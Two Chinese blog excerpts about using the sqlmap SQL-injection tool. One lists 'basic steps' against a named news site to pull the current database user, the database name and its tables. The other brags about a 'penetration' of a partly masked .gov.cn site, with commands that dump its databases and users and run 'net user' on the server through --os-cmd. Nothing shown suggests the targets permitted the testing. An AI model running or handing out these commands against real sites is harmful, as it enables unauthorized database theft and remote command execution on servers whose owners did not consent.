摘要:
这东西真的很好用,今天好好的看了下。并且实践出真知,这东西的强大不是靠吹的。******************基本步骤***************sqlmap -u "http://news.hackworry.com/news?id=1" --current-user #获取当前用户名称sqlmap -u "http://news.hackworry.com/news?id=1" --current-db #获取当前数据库名称sqlmap -u "http://news.hackworry.com/news?id=1" --ta 阅读全文
摘要:
这次渗透没有什么亮点,主要就是SQLMAP。这玩意很给力。直接给干掉了。。。 2005 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --dbs --threads 10 2006 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --users --threads 10 2007 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-cmd="net user" 阅读全文